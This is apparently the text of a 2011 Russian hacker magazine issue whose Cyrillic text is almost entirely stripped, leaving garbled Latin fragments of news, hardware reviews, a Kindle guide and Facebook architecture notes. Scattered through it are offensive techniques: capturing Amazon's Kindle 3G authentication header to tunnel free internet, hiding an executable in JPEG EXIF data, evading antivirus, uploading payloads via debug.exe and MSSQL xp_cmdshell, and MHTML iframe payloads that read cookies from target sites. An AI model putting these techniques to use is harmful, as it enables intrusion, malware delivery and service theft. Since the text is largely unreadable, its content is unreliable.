Академический Документы
Профессиональный Документы
Культура Документы
.
210
:
DNS-: . 54
04 (147) 2011
NATIVE API
. 110
BLACK HAT /
BLACK HAT
. 64
147
AMAZON KINDLE
FACEBOOK
TJAT.COM
-
GEOHOT VS SONY
GO
CISCO
. 60
INTRO
CeBIT :
,
,
. CeBIT,
20
IT- , , .
:
CEO
, .
,
, . , ,
Black Hat,
,
.
64 , - .
!
nikitozz, . .
udalite.livejournal.com
Content
MegaNews
004
Ferrum
016
018
Samsung 9-
PC_Zone
023
024
Kindle
028
Amazon
Google
Google/Gmail-
030
034
500
037
Lotusphere 2011
042
048
054
060
064
070
Easy-Hack
ICQ-
DNS.
076
084
090
095
100
105
110
116
Go
Augmented reality
Native API
SYN/ACK
120
126
132
CRM
OpenVZ
136
143
Unit- C++
ring0-
Samba-
Ubuntu
140
X-Tools
BSD
Cisco
Welcome to BlackHat!
GeoHot vs Sony
Tjat.om:
MALWARE
072
080
IBM
038
144
FAQ UNITED
FAQ
8.5
WWW2
web-
028
Google
Google-
064
Welcome to BlackHat!
072
ring0-
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>
> DVD
Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-
>
/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>
>
>.
>
>
>
>
>
>
> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>
(polikarpova@glc.ru)
>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>
>
> -
(alekseeva@glc.ru)
> MAN TV
>
>
>
(kosheleva@glc.ru)
>
>
> :
DVD-: claim@glc.ru.
>
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
>
101000, , , / 652,
,
77-11802 14.02.2002
Zapolex,
.
176 394 .
.
. ,
,
.
.
.
:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
!
(, Cola, )
, , . Powertrekk
, , ,
. Powertrekk ,
, , - .
1000 .
, 1600 , , Powertrekk . , , .
52 , 19 30 . 4
/ , 15 . , , , . Powertrekk, ,
. Powertrekk
, USB.
Powertrekk ( ), ,
5, 10 24 . ,
, Powertrekk . , , .
Arstechnica : 30%
- ,
( P2P ).
IPAD 2
, Apple
iPad 2 ,
.
: 33% (8.8
, iphone 4), 10%.
, iPad : , -
004
720p, ,
FaceTime.
,
A5,
(A4). , (,
, ),
. iPad 2
,
Smartcover . ,
, iPad .
($39) ($69).
HDMI-
1080p. iPad ( iPhone 4 iPod touch)
, $39. iPad 2
. : Wi-Fi $499
16-, $599 32- $699 64-
. Wi-Fi 3G $629, $729 $829 .
X 04 /147/ 2011
MEGANEWS
WEXLER
.
,
. , Wexler.book E5001.
Wexler (600x800),
E-ink.
:
( 11 000 ).
c Wexler.book E5001 ,
.
(,
, - :) ). 4 ( 200 000 ),
20 MicroSD.
.
, ,
. mini-USB,
, FM- .
5990 .
Microsoft
2 Windows Phone 7.
,
.
Fujitsu
Kyocera Communications. Kyocera
Communications Android-
Kyocera Echo,
3.5
800 480.
: Qualcomm
Snapdragon QSD8650 (1 ), 512
(RAM), 1 -. microSD ( 32 ),
5 ,
Wi-Fi Bluetooth, , , GPS.
, , , .
,
. ,
,
.
, 8 .
Fujitsu .
, Fujitsu
MWC 2011 Fujitsu ,
,
.
,
,
. , ,
,
Kyocera Echo.
Symbian, , Android.
Kyocera Echo
$200,
. $800-1000.
-
( ) IT
. , Facebook ,
, Wikileaks
. , LIGATT Security
International, ,
, .
006
- . ,
,
IT- ( LIGATT Security
International) , , .
, ,
, , .
X 04 /147/ 2011
MEGANEWS
MICROSOFT NOKIA
. , Nokia Microsoft
( ,
),
, ,
Office
Mobile . , , Nokia
Windows Phone 7, WP7
.
Symbian ,
-
. Intel Nokia
MeeGo, , ,
.
, ?
,
, :
Bing
adCenter
Nokia. Nokia Maps,
,
Microsoft.
Nokia Store Microsoft Marketplace . Nokia
Windows
Phone.
Mozilla
.
$40 000! ,
$500, $3000.
, !
,
. ,
. ,
: 2015 (,
) .
, ?
. ,
, ,
. ,
. , , ,
. , , -, ,
. ,
, ,
. ,
, ,
, ( !)
. . ,
? .
008
X 04 /147/ 2011
MEGANEWS
WP7?
:
Windows Phone 7
Device Manager. , ,
,
, . , , Windows Phone 7 Device Manager
,
Windows Phone 7 ( Chevron WP7),
.
,
Microsoft , -,
.
Service Pack 1 Windows
Phone 7,
. -
,
touchxperience.com.
.
,
. ,
WP7
(
),
,
.
45
, (
). , .
SMS-
, : , , .
, ,
-. IP-
, ,
IP- .
SMS- ,
(DDoS-, , ),
ShmooCon 2011, . SMS-,
Android,
, .
, ,
. ,
, , SMS-, - . , , .
( ?), ,
. , , . ,
: grmn00bs.com/2011/01/30/smartphonecode-release-for-shmoocon.
010
X 04 /147/ 2011
,
The
Anonymous
WikiLeaks.
,
DDoS-,
,
(
PayPal, Mastercard, ,
), .
,
. Financial
Times, , ,
,
, ,
45 , . :
HBGary Federal
HBGary,
, , .
Facebook, IRC-,
, , ,
. , ,
,
, , RSA Conference 2011
-. ? . ,
Financial Times
... DDoS-
, Anonymous ,
: - ,
HBGary Federal . , 60 000 .
,
HBGary,
, ,
. hbgary.com rootkit.com.
( The Pitare Bay).
, ,
, iPad. , ,
, ,
. ,
Bank of America WikiLeaks: , WikiLeaks,
- ,
. , WikiLeaks,
. , ,
, . ,
, ,
.
MEGANEWS
,
80- .
Jeopardy! (
), IBM Watson?
, .
,
IBM. Watson $77 000,
Jeopardy!
Watson
.
: Watson
,
- . , IBM
,
.
, 2007
295 (295 ).
INTEL
Intel Sandy
Bridge , 32- .
,
. , Cougar Point,
.
Intel Core ( SandyBridge), , , .
SATA - SATA
, , ,
.
. ,
. , , Intel , :
(
). Intel
, .
, , ,
HP, Dell Toshiba
, .
Intel
,
$700 000 000. , , , , ,
Intel . .
Microsoft , . ,
Windows
. !
0-DAY
Computerworld
Intel , . Intel
, . , ,
0day- ,
. , , , ,
012
, , ,
. , ,
Intel , McAfee (
).
,
. ,
, , Intel.
X 04 /147/ 2011
.
Symantec, , Black Hole Exploits Kit .
, 10% ,
Black Hole 100 000 .
- Neosploit
Phoenix.
$1500, . Symantec (
-)
. Java,
HCP (CVE-2010-1885), PDF, MDAC .
.
, ,
iframe
. . ,
,
:).
, , Websense. Tinie
Facebook Viral Application , ,
, ,
- .
,
Facebook,
.
$25,
.
-, ,
, ,
. ,
,
,
. .
, ,
,
.
. ICANN , IPv4
. IPv6 ,
- .
HTML5 CAMP
,
HTML5. ,
, . ,
HTML5 Camp,
-. . , - Opera Software,
Canvas
SVG. , .. ,
HTML5.
. ,
2011 HTML5
Working Draft Last Call, 2014
W3C. ,
HTML5 Camp. microsoft.com/ru-ru/events/html5camp.
, ... . RoboEarth,
(roboearth.org). . World
Wide Web; Wikipedia, , .
? ,
, , .
, RoboEarth,
.
AMIGO.
, , , AMIGO,
RoboEarth . ,
X 04 /147/ 2011
,
. , RoboEarth
- ,
. ,
, :).
013
MEGANEWS
RADEON HD 5570 -
, ,
-. , , . ,
, : Sapphire SAPPHIRE HD 5570 XtendTV.
TV-
Mirics FlexiTV, -
DVB-T. , -, Media Center ,
.
SAPPHIRE HD 5570 XtendTV Mirics
FlexiStream 49 USB 2.0.
Sapphire
, (
, ). XtendTV, .
GPU, Radeon HD 5570 GDDR5
1 , . DVI
HDMI,
. , ,
, , Sapphire, , ?
SOURCEFORGE
SourceForge.net. , ,
.
, CVS-, web- (ViewVC)
014
, shell
ProjectWeb. -
- , . ,
sourceforge.net
. .
- , (!)
. , ,
, SourceForge
. :
(CVS ViewVC) ! ,
, , . ,
Sourceforge.net ,
. , , , SourceForge
, , GitHub
Google Code.
X 04 /147/ 2011
,
Level-up ,
,
,
,
,
USB-,
-
.
,
Linux
.
.
,
,
,
.
ZyXEL
Keenetic Linux NDMS.
.
,
nomppe nomppc maxfail 0
holdoff 60
pppd-. PPTP-
, .
Keenetic: , 802.1,
VLAN
( 802.1Q
).
:
PPTP L2TP
90/70 /, PPPoE IPoE
95 /.
Ethernet,
3G/4G-.
,
, 3G- (
)
.
. Keenetic
.
,
X 04 /147/ 2011
-.
-
, .
Transmission . ,
-
, :).
!
USB-.
.
.
: -
..
Keenetic
GDI-.
802.11n.
,
Wi-Fi , .
.
802.11n 300 /. . ,
100- Ethernet,
802.11g!
Wi-Fi.
IP-.
.
. Keenetic
, IPTV
Wi-Fi. IPTV
.
(
)
.
USB.
Keenetic , .
-.
,
Linux .
Keenetic
(FAT/FAT32/EXT2/EXT3/
NTFS) , SMB FTP
( ).
.
, . , , ,
.
. Keenetic
SPI DDoS-.
Wi-Fi Protected Setup (WPS)
Wi-Fi
.
015
FERRUM
, ()
Samsung 9-
:
: 13.3'', 1366768, LED-, 16
: 400 (/2), SuperBright Plus
: Intel Core i5-2537M, 1.4
: Intel HM65
: DDR3 4
: Intel HD Graphics 3000
: SSD 128
: Bluetooth 3.0, Wi-Fi 802.11n
: USB 3.0, USB 2.0, micro HDMI, HP,
MicroSD
: -
: 46 * ( )
: 328227~16
: 1.31
, , .
, - , , ,
, . ,
, . ,
. Samsung 9-
,
. SMS
MMS .
, ,
Samsung 9- . !
Samsung 9
. , , ,
, 17 , Samsung 16.
! , ,
. ! . ,
. ,
, . Samsung ,
, .
,
, . ,
(
) Samsung 9-
, . ,
(+100500
016
, ).
! .
, . Samsung 9-
. , ,
, ,
.
, !
, , .
, ,
, , .
(
). . ,
.
Samsung 9- , -, ,
. USB,
.
- MicroSD
. Micro HDMI ,
. ,
, HP. Ethernet
RJ-45 ,
, .
Samsung 9- Ethernet, Wi-Fi 802.11n. SSD-, HDD . Bluetooth
3.0, .
, , Intel
Sandy Bridge. 32 , Intel Core i5-2537M . ! Intel HD Graphics 3000 , NVIDIA
GeForce GT 320M, NVIDIA GeForce GT 420M AMD Radeon HD 6470M
. , FPS
- 40.
SSD-, , 128 .
X 04 /147/ 2011
sRGB
, Windows,
. HDD.
, , Samsung ( ,
-) .
- 400
, . -,
: 16 .
TN+Film .
sRGB ( )
. ,
Spyder3, .
Samsung 9- Samsung. , !
PhoneShare.
,
,
, .
telnet- Samsung PhoneShare
- GPRS- . ,
, . , Wi-Fi ,
PhoneShare , Ethernet. MMS SMS .
Samsung AllShare DLNA,
X 04 /147/ 2011
: , , , . ,
,
.
DLNA .
? , ,
. .
- (,
!) .
.
. , ,
.
Be cool
Samsung 9
( ), ,
. .
, , .
,
,
. .
,
, -- . .
,
. z
017
FERRUM
,
. ,
. ,
,
.
.
. , .
,
,
Wi-Fi Bluetooth. ,
,
, ,
, . . , ,
. ,
.
,
. 3DMark
06, 3DMark Vantage PCMark Vantage. ,
WinRAR 7Zip.
SuperPi -
018
. Call of Juarez.
, ,
.
,
.
.
, Apple iMac,
Windows 7, .
41000 .
82000 .
Acer
Aspire AZ3751
Apple
iMac 27
: c 21.5", 1920x1080
: Intel Core i3-540, 3.06
: Intel H57 Express
: NVIDIA GeForce GT 320, 1
: 4 DDR3, 2x SODIMM
: SATA 1.5 (7 200 /)
: Blu-ray ()
: 10/100/1000 Gigabit Ethernet LAN, Wi-Fi
802.11 b/g/n, Bluetooth 2.1 EDR
: 6--1, (), -
( DVB-T)
: 6 USB 2.0 (2 ), HDMI, FireWire 400, 2 , 2
: 496x549x129
: 6
: 27", 25601440
: Intel Core i5, 2.8
: n/a
: ATI Radeon HD 5750, 1
: 4 DDR3, 2x SODIMM
: SATA 1 (7 200 /)
: DVD SuperMulti
: 10/100/1000 Gigabit Ethernet LAN, Wi-Fi
802.11 b/g/n, Bluetooth 2.1 EDR
: 2--1,
: 4 USB 2.0, Mini DisplayPort, FireWire 800, , , S/PDIF
: 517x650x207
: 13.8
Acer
. , ,
, web-,
. -,
. , ( )
, .
. , , .
, , Acer
.
, .
: ,
.
.
X 04 /147/ 2011
, Apple
.
27- ,
- ,
25601440. , ,
. -. , . , Magic Mouse, , . Mac
Windows
.
.
80-
. MacOS,
.
019
FERRUM
61000 .
60000 .
Sony
VAIO VPCL13M1R
HP TouchSmart
600-1220ru
: 24", 1920x1080
: Intel Core 2 Duo E7500, 2.93
: Intel P43 Express
: NVIDIA GeForce GT 330M
: 4 DDR2, 2 SODIMM
: SATA 1 (7200 /)
: DVD SuperMulti
: 10/100/1000 Gigabit Ethernet LAN, Wi-Fi
802.11 b/g, Bluetooth 2.1 EDR
: 6--1,
: 5 USB 2.0, FireWire 400, S/PDIF
: 429x190582
: 12.5
: 23", 1920x1080
: Intel Core i5-430M, 2.26
: Intel HM57
: NVIDIA GeForce GT 230M
: 4 DDR3, 2 SODIMM
: SATA II 1.5 (7200 /)
: Blu-ray ()
: 10/100/1000 Gigabit Ethernet LAN, Wi-Fi
802.11 b/g/n, Bluetooth 2.0 EDR
: 6--1, , S-video,
, IR blaster, HDMI , ( DVB-T), MPEG 4, HP Win7 Media Center
: 5 USB 2.0, S/PDIF
: 583x126x451
: 12
Sony , . ,
.
, .
,
CD DVD.
(,
,
). ,
, .
, ,
.
, - Intel Core
2 Duo . .
-
.
020
. ,
,
! :
Bluetooth Wi-Fi, ,
. ,
, , . -, .
, . ,
, .
web- .
,
,
80- .
X 04 /147/ 2011
43000 .
25000 .
Lenovo
IdeaCentre A700
ASUS EEE
Top ET2010AG
: c 20", 1600x900
: AMD Athlon II X2 250u, 1.6
: AMD RX780
: ATI Radeon HD 5470, 512
: 4 DDR3, 2x SODIMM
: SATA 500 (7200 /)
: DVD SuperMulti
: 10/100/1000 Gigabit Ethernet LAN, Wi-Fi
802.11 b/g/n
: - 2--1,
: 6 USB 2.0, HDMI, S/PDIF
: 497x374x48
: 4.75
,
JBL. ,
. Intel Core i3 ATI Mobility
Radeon HD 5470, , ,
. Bluetooth,
. , ,
, (, ).
, Lenovo
.
,
. .
-CD.
X 04 /147/ 2011
ASUS .
( 5 ) . AMD ,
512 .
.
,
, (,
).
,
. , .
. , ,
.
021
FERRUM
3DMark Vantage
PCMark Vantage
- Sony
3DMark06
Intel
SuperPi
Acer Sony
WinRAR
0 5 10 15 20 25 30 35
AMD ASUS
7-ZIP
Acer
, ,
.
. HP
022
40 45 50
Acer
TouchSmart 600-1220ru,
. , Acer Aspire AZ3751
. Apple iMac
. z
X 04 /147/ 2011
PC_ZONE
Step (twitter.com/stepah)
Windows.
Microsoft. .
2003 ,
1 500
000 .
,
. ,
(
)
,
.
(
SDL),
( DEP ASLR),
- 0day-,
.
,
,
, Internet Explorer.
,
.
, Microsoft .
Security Essentials,
,
.
Microsoft Attack Surface Analyzer.
, ?
, .
. ,
, Microsoft,
, .
,
-
.
. X 04 /147/ 2011
(
),
:
,
. ,
:
, .
- ,
.
Google Cloud Connect,
- Google
Microsoft Word.
. :
,
? , Attack
Surface Analyzer
( baseline) .
, ,
( ,
, ,
, ,
).
cab-, XML-
( ,
).
,
Cloud Connect.
(
product)
Attack Surface Analyzer,
.
snapshot ,
Generate
attack surface report.
, .
Attack Surface Analyzer
. , Google Cloud Connect:
New Service (Google Update Service);
New Running Processes (google crash
023
PC_ZONE
,
Step ()
, (twitter.com/stepah)
KINDLE
Amazon
. ,
. .
Amazon Kindle.
, , , SSH
.
. ,
,
.
: - , ,
. : Kindle Amazon
Nook Barnes & Noble. : QWERTY Linux , Android. , ,
. - .
. Amazon Barnes & Noble
,
, . ,
. Amazon : 2010 115 Kindle-
100 Kindle-,
. : Amazon Kindle
Wi-Fi $139. : $139. , ,
,
. :
Kindle (, , ) . ,
Amazon Kindle , ,
, .
024
, - -
, ( ).
, USPS
( )
1000, .
Visa MasterCard.
, ( 600
). Visa,
-.
, ,
Qiwi. ,
Amazon.com, Kindle . ,
: Kindle Wireless
Reading Device, Wi-Fi, 6" Display, Graphite Latest Generation cannot
be shipped to the selected address. -
! , .
, .
.
, ,
.
, myus.com shipito.
com. $8.50.
(xakep.ru/magazine/
xa/129/040/1.asp). : Kindle
? : - $180 ($139 , $0
X 04 /147/ 2011
HTTP://WWW
links
Amazon
Kindle?
Settings:
3G-: 311 (ALT+EQQ);
:
411 (ALT+RQQ);
3G-: 611 (ALT+YQQ);
WiFi-: 711
(ALT+UQQ).
:
.
,
.
, :
bit.ly/cyr_sym;
:
bit.ly/rus_kindle;
fb2-:
bit.ly/fb2_kindle;
,
PDF DJVU:
wiki.mobileread.com/wiki/Duokan_Kindle;
:
bit.ly/slovari_kindle.
, $8.5 , $30 ),
5000 Wi-Fi. .
,
. , Kindle
.
, Amazon - .
. , . , , .
, fb2
epub. , Kindle ,
, . ,
, Kindle . .
1. , Amazon.
X 04 /147/ 2011
Kindle:
the-ebook.org/
forum/viewforum.
php?f=37;
Amazon:
mobileread.com/
forums/forumdisplay.
php?f=140.
INFO
info
Kindle. ( 3.1)
,
.
,
Amazon.
. Instapaper (instapaper.com),
. .
, -
025
PC_ZONE
Shipito
, ( Read later) Instapaper.
,
- , ,
Kindle. Instapaper
Kindle-
usb-. , @free.
kindle.com ( @kindle.com), .
Instapaper ,
. ,
Google Reader.
,
-, , .
, kindle.topixoft.com.
jailbreak
, .
,
. .
,
. , , ,
3G-
. Amazon
Kindle, .
:
1.
, (mobileread.
com/forums/showthread.php?t=88004). kindle-jailbreak-0.6.N. .
.bin-, src.
Kindle, .
update_*_install.bin.
k2 K2 US, k2i K2 GW, dx KDX
US, dxi KDX GW, dxg KDX Graphite, k3g K3 3G (US [B006]), k3w
K3 WiFi [B008] k3gb K3 3G (UK [B00A]).
. Kindle
, update_k3g_install.bin.
2. Kindle,
Home Menu Settings Menu Update Your Kindle.
, , .
.
3. Kindle .
026
Kindle
3G
,
. . Kindle 3G
Free 3G Worldwide.
, ,
( SIM-)
. !
, , Wi-Fi
. , ,
, (
) , Amazon. : !
@kindle.com
(99 , ).
,
. ,
. ,
, Kindle .
, Amazon ,
. !
Kindle tethering-,
! , ?
. .
,
3G ( : client0.cellmaps.com/viewer.
html?cov=1 ).
, ? , (balaganov.wordpress.
com/2010/09/25/tethering-the-kindle-3). ,
:
1. ( ,
), Kindle
, ,
. , usbNetwork (bit.
ly/usbNetwork).
, Kindle,
, , .
2. Kindle
. ,
QWERTY-. : Home
Del ;debugOn Enter. .
X 04 /147/ 2011
telnet
usbNetwork
, : "~usbNetwork"[Enter].
3. . , RNDIS/
Ethernet .
,
. ,
Xerox (bit.ly/RNDIS_driver). Windows 7/Vista Windows Mobile Device Center
(bit.ly/wmdc_download).
4. .
IP- 192.168.2.1 255.255.255.0.
PuTTY Kindle ( IP- 192.168.2.2) telnet. Linux.
5. SSH-.
,
PuTTYgen (
PuTTY).
Generate,
.
Kindle .authorized_keys usbnetwork/
etc. , , Save public key,
BEGIN SSH2 PUBLIC KEY, Kindle SSH-.
-
.
6. SSH,
WinSCP. root
. , X 04 /147/ 2011
mntroot rw.
7. tcpdump
ARM- (eecs.umich.edu/~timuralp/tcpdump-arm),
Kindle, .
? , HTTP-,
, - Amazon.
- (x-fsn
authentication key), . ,
,
,
.
8. ~/tcpdump-arm -nAi ppp0 -s0 w
xfsn.log . xsfn.log
, x-fsn:.
: cat xfsn.log | grep -m 1 x-fsn.
9. .
,
Modify Headers (bit.ly/modify_headers) Firefox.
, x-fsn: .
10. , Kindle. Firefox -
127.0.0.1:888 SSH- .
PuTTY 888 : 888:72.21.210.242:80 root@192.168.2.2. 72.21.210.240
Amazon, 192.168.2.2
Kindle, 888 .
,
Kindle .
11. usbNetwork DISABLED_
auto auto, .
, 3G
. ( , SSL). ! ( ) .
, Amazon -
. ,
.
Kindle .
Amazon
,
. .
.
, . . z
027
PC_ZONE
Step (twitter.com/stepah)
GOOGLE
DVD
dvd
Google/Gmail-
, ,
, . Google
.
!
Google- .
,
Google, , .
, - , - ,
.
, Gmail
(
),
.
,
.
, ,
. ,
.
. :
028
, ;
, .
-,
. , ( TAN)
.
Google, . :
Google Authenticator,
Android, iPhone
Blackberry;
SMS-,
Google;
( , SMS).
, :
.
. ,
(, , ),
.
, Google . !
X 04 /147/ 2011
Google (google.com/accounts).
Personal Settings Security
Using 2-step verification,
.
.
, Google Authenticator ( iPhone, Android
Blackberry), .
, Google, secret
key . ,
QR-. Google Google
Authenticator ,
SMS-.
.
,
.
( backup) ,
. Google - ,
. , -
, ,
. .
:
( ), SMS
(
).
, ?
, , .
1.
Google (, Gmail).
2. , .
3. . Google
. Google Authenticator .
SMS
X 04 /147/ 2011
029
PC_ZONE
(insight-i t.ru)
500
Facebook, ,
.
, . .
Facebook ?
:
500 000 000 ( );
200 000 000 000 ;
150 000 000 ;
2 000 000 000 000 ;
030
HTTP://WWW
links
;
;
;
opensource-.
500
;
1 000 000 ;
, .
?
,
,
-
Facebook ,
. ,
, .
.
,
, .
, ,
Facebook, .
, , .
Unix: , ,
.
, ,
, . ,
,
Facebook:
Linux;
PHP + ;
memcached;
- MySQL;
Scribe.
php-
, HTML
( MySQL, memcached) X 04 /147/ 2011
Facebook
20
Facebook?
1 000 000 ;
1 323 000 ;
1 484 000
;
1 587 000
;
1 851 000 ;
2 000 000 ;
2 700 000 ;
10 200 000 ;
4 632 000 .
Facebook
: insightit.ru/highload
DVD
dvd
Facebook
.
. , Facebook :
-;
;
.
, ,
. .
PHP
: PHP? . , ,
. .
. ,
,
, .
. Facebook
PHP,
-, APC ( ,
, )
( memcache, , , ,
, ).
031
PC_ZONE
Facebook
.
, :
SMC ( ) , , ;
ODS , ;
Gatekeeper ,
A/B- (, ,
).
MySQL
. , MySQL
Facebook . ,
. .
,
JOIN, ,
. . -,
. Facebook MySQL, ,
. , .
,
.
, ( )
( , , ),
( ) ,
.
Memcached
032
opensource
Facebook.
: Thrift (incubator.apache.org/thrift), Scribe (github.com/
facebook/scribe), Tornado (tornadoweb.org), Cassandra (cassandra.apache.org), Varnish (varnish-cache.org), Hive (hive.apache.
org), xhprof (pecl.php.net/package/xhprof).
PHP, MySQL, memcached.
Facebook opensource ,
opensource (developers.facebook.com/opensource).
Facebook
memcached MySQL . memcache
multi-get ,
.
Facebook
. opensource-
memcached: 64- , ,
, , memcache UDP
( TCP-).
Linux memcache.
? memcached 250 000
30 000 40 000 .
Thrift
Facebook
Thrift. ,
.
.
Thrift
, , , C++, PHP, Python, Java,
Ruby, Erlang, Perl, Haskell. (,
, ) (,
JSON). : , , , .
SOAP, CORBA, COM,
Pillar, Protocol Buffers, , Facebook .
X 04 /147/ 2011
Facebook
Facebook Connect
Facebook
MySQL,
. ,
.
-, . .
,
CDN (
) .
. ,
.
(blob), ,
( , ) . Facebook
Haystack . , !
Thrift . ,
. Thrift
. Facebook ,
. :
. Thrift, Facebook,
.
,
,
. . . .
:
,
, NFS;
NFS HTTP. ,
, ,
.
, , . ,
X 04 /147/ 2011
, LAMP , .
, PHP+MySQL+Memcache ,
. ,
:
PHP ;
PHP ;
.
Facebook ( ) ,
,
,
, ,
.
.
,
. . facebook.
com. z
033
PC_ZONE
:
Google
. ,
. , .
, Google. .
, . , ,
, runtime, Chrome OS, Native
Client. () . -
034
. , ,
,
code.google.com/p/nativeclient. Runtime- . Google ,
ThreadSanitizer (ode.google.com/p/datarace-test), data races
( ).
X 04 /147/ 2011
Google
1. ? ?
: ?
2. .
. ( ):
? : ,
?
,
.
google.ru/jobs, ,
Google . ,
. : ?
: , , .
. ?
. , , .
.
. Google ++ Jav: ,
, . ,
C#, , C++. ,
C#,
,
. , , . , ,
. , Google
, :
, : , ,
(, ).
,
.
:
X 04 /147/ 2011
. , Google, ,
. ,
:
Google, , .
,
. , : 18
. , , . ,
. , . Google
. , ,
.
, 12. , ,
. ,
. - 9, - 12, - 3
. , , .
7 , 8 .
Google . . . , ,
- :
, -!.
Google , .
. , ,
, .
HTML5 , , -.
HTML5, .
.
Chrome OS . ,
. ?
- ,
. . Chrome OS . Chrome OS , ( ).
,
035
PC_ZONE
. Chrome OS
, .
App Engine
.
, .
.
, .
, . ,
, ,
. , , ,
. ++,
. ,
.
, .
,
, ++. , ,
. .
036
Tech-talk,
Go
Go,
. Google
, .
, Go ,
. . ,
. ++ ,
. . , ,
. , ,
++. ,
++. , , ,
.
,
. Go . ,
, implements ( Java) .
Go
, .
. . . z
X 04 /147/ 2011
LOTUSPHERE 2011
IBM
IBM
Lotusphere, .
:
, ,
, .
IBM Lotus (
) , Lotus
Notes Lotus Domino. , , . , ,
- .
.
: Get Social. Do Business.
social , IBM Lotus. ,
, e .
,
. ,
? .
,
Lotus. Lotusphere 2011
( ) ,
.
.
, Lotus,
, collaboration,
. ; ,
.
,
,
. , e-mail (
) - . ,
! , , 2011 , . ,
, .
,
Lotus,
X 04 /147/ 2011
037
GreenDog (agrrrdog@gmail.com)
Easy Hack
1
:
JPEG.
:
- .
Wikipedia,
e . ,
. ,
( ), . , e. . e
, :).
e XXI , . jpeg (dl.packetstormsecurity.
net/papers/general/Embedding_hidden_files_in_jpeg_and_abuses.pdf ).
-, , e e :). , , , /
exif- jpeg-. Exif ,
(), , , . ,
.
, e .
.
- linux. .
e test.jpg, , evil.
exe. exif- jpeg:
exiftools test.jpg
uuencode ; m ,
Base64.
exif- test.jpg.
exiftool Comment "<=" evil.txt test.jpg
:
-Comment , ;
"<=" evil.txt evil.txt.
038
dd ;
if ; of ; bs=1 1 ;
skip=24 24 ( jpeg).
, test_from_FB.uue
, evil.exe Base64. exe-:
uudecode test_from_FB.uue
.
X 04 /147/ 2011
e *nix, Win,
. :
1. jpeg.
2. "" ( exif).
3. .
:
, VIRUSTOTAL.
:
, -!
. - (, ),
.
, ,
, , , .
,
, , .
, , . ,
- . ,
, ,
X-Antivirus-Status:
, . X-Antivirus: ,
.
, ,
, . ,
- ( X-spam)
( X-Mailer). .
,
. . .
-.
, - . , .
netcat - .
, -:
4. jpeg - .
5. .
6. e Base64.
Base64
-.
virscan.org;
virusscan.jotti.org;
scanner.virus.org;
vscan.novirusthanks.org;
e-antivirus.com.
,
.
e ,
, ,
e. , .
e . e , ,
.
,
No distribute, , /
. (forum.antichat.ru/
threadnav32269-1-10.html) , .
, . , e -,
, , ().
wizard-checker.com;
virtest.com.
virustotal.com;
viruschief.com;
filterbit.com;
. MS Outlook Express
. Avast
X 04 /147/ 2011
039
:
, .
, e ,
, . (Positive
Technologies) ptsecurity.ru/download/PT-Metrics-Passwords-2009.
pdf. e . , e . ,
:).
:
(BIN2HEX)
e :
skullsecurity.org/wiki/index.php/Passwords;
devteev.blogspot.com/2010/01/weak-passwords.html.
e
:
123456 (+\- 2 );
Qwerty;
abc123;
password;
_;
_.
).
Fast Track e /- Metasploit.
, , e
e BackTrack R2. , .
:
e , win-
( nix ) , ,
. , . ,
: .
debug.exe. Debug - Windows,
.
- .
exe- hex (
). ,
. debug, exe.
,
Fast Track - (
1. Fast Track.
2. "Binary to Hex Payload Converter".
3. exe-,
.
echo,
. , .
, , .
Citrix ( RDP). , e ,
: ,
64 . . netcat
(, 60 ) -
- Metasploit, meterpreter .
, . ?
exe- debug-
040
X 04 /147/ 2011
.
MSSQL-,
xp_cmdshell (
).
MSSQL. DefCon
16 2008 Securestate (defcon.org/images/defcon-16/
dc16-presentations/defcon-16-panel-black_vs_white.pdf).
, e
(https://media.defcon.org/dc-16/tools/sa_exploiter.rar).
exe-,
debug.exe,
.
, debug.
, ,
(, ).
e . Metasploit ,
MSSQL,
( c DefCon). ( MSF )
offensive-security.com/metasploit-unleashed/The_Guts_Behind_It.
BackTrack 4 - /opt/metasploit3/
msf3/data/exploits/mssql. (h2b) hex-
debug. , e ,
, (, converter.tmp):
e exe-:
debug < converter.tmp
:
move converter.bin converter.exe
exe-.
.
hex-. hex- exe.
, :
converter.exe evil_file_hex.txt
Windows debug.exe.
( Win7 ).
:
,
JAVASCRIPT.
:
,
. .
e, .
, .
: flash, pdf reader, java. . , / ,
,
.
, .
100%, http-
User-Agent. , JavaScript.
,
, , -, , , , IE ActiveX-,
.
, . -,
, , e (enabled).
- ? , -.
pinlady.net/PluginDetect, .
Java, QuickTime, Flash, Shockwave,
Silverlight, PDF- e
. , , .
.
. javascript- plugindetect.js.
6
X 04 /147/ 2011
?
:
<script type="text/javascript" src="plugindetect.js">
</script>
Adobe Reader, :
var reader_version = PluginDetect.getVersion("AdobeReader");
,
.
.
e ,
.
: ][ !
:
e group.xakep.ru. - .
, , .
- .
041
(icq 884888, snipper.ru)
, ! ][.
.
,
.
01
MICROSOFT WINDOWS MHTML
BRIEF
, .
MHTML (MIME Encapsulation of
Aggregate HTML) IE. -
MHTML MIME-
.
,
. , - .
EXPLOIT
80vul.com.
1. XSS mhtml-.
MHTML,
Content-Type . , mhtml-
XSS- - *.jpg.
(, ) html-
( )
:
<iframe src="MHTML:http://target-site.com/upfile/
demo.html!cookie"></iframe>
.
.
, ,
-
042
.
: copy /b 1.jpg + 1.mhtml 2.jpg.
2. CRLF/XSS- MHTML-.
MHTML CRLF ( ).
, CRLF ( , ),
.
iframe-, advisory.
MHTML-
JSON, XSS
Content-Type .
3. X-FRAME-OPTIONS.
, .
, - html-
response-, X-Frame-Options,
.
X-Frame-Options DENY, IE , .
SAMEORIGIN, IE ,
,
X-Frame-Options.
ClickJacking-.
MHTML:
<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie">
</iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php">
</iframe>
X-Frame-Options
calc.exe MHTML
(http://goo.gl/kmBXB).
